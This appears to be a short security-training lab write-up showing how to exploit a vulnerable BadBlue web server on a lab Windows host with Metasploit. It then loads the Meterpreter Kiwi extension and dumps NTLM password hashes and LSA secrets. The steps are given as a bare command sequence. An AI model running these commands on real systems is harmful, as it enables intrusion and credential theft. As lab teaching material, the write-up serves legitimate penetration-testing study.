Windows: Meterpreter: Kiwi Extension
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali machine and a target Windows machine. The target machine running a vulnerable application will be accessible at demo.ine.local.
Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module. Then, use the meterpreter Kiwi plugin to extract sensitive data from the target's machine.
Objective: Exploit the application and find all the flags:
Find Administrator and Student users NTLM hash.
Dump LSA secrets to find Syskey
Tools
The best tools for this lab are:
Nmap
Metasploit Framework
Writeup
nmap -sSVC demo.ine.local
searchsploit BadBlue
msfconsole
exploit/windows/http/badblue_passthru
set rhosts demo.ine.local
run
migrate -N lsass.exe
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets


Last updated